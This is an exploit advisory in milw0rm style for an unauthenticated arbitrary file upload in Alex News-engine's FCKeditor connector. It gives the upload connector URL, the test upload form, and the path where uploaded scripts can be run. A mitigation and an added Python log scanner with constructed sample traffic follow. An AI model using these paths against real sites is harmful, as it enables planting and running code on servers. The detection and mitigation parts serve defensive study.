########################################################################
#
# Yellow Flood Organization
#
# Alex News-engine (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
#
# Discovered by: Batter
#
########################################################################


####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- How to use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploaded-file.*

####################
- Solution:
####################

Restrict access to the FCKeditor file-manager connector (and its upload directory) so that only trusted, authenticated users can reach it.

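The paths in this advisory also give a defender a concrete log signature. The following Python script is an added example, not part of the advisory: it scans Apache combined-format access-log lines for the FCKeditor connector's FileUpload command, for fetches of the bundled test.html upload form, and for script files served out of the News-engine upload directory. The upload-directory prefix is inferred from the "how to use" URL above, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Combined-log-format fields we need: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths from the advisory: the FCKeditor connector tree and the News-engine
# upload directory (the latter inferred from the advisory's "how to use" URL).
CONNECTOR_MARKER = "/filemanager/browser/default/connectors/"
UPLOAD_DIR = "/images/site_images/"
EXEC_EXT = (".php", ".php3", ".php4", ".php5", ".phtml")

def classify(target, status):
    """Label one request target, or return None if it is not of interest."""
    url = urlparse(target)
    path = url.path.lower()
    query = parse_qs(url.query)
    if CONNECTOR_MARKER in path:
        if path.endswith("/test.html"):
            return "connector_test_page"        # the sample upload form
        if query.get("Command", [""])[0] == "FileUpload":
            return "connector_file_upload"      # the upload call itself
        return "connector_access"               # any other connector use
    if UPLOAD_DIR in path and path.endswith(EXEC_EXT) and status == "200":
        return "script_served_from_upload_dir"  # uploaded script was executed
    return None

def scan(log_text):
    """Return (ip, timestamp, label, target) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            label = classify(m["target"], m["status"])
            if label:
                findings.append((m["ip"], m["ts"], label, m["target"]))
    return findings

# Constructed sample lines (not real traffic) showing the trail the advisory's
# steps would leave: form fetch, upload call, then a hit on the stored file.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Nov/2008:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2008:10:01:09 +0000] "GET /admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2008:10:01:15 +0000] "POST /admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2008:10:01:20 +0000] "GET /news/news/images/site_images/uploaded.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""
```

Run `scan()` over a real access log to see the same three-step sequence; a hit on the connector from a client that never authenticated to the admin area is the signal that the restriction in the Solution section is not in place.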
####################
- Greets :
####################

THE.HACKER.ONE , Str0ke

####################

# milw0rm.com [2008-11-19]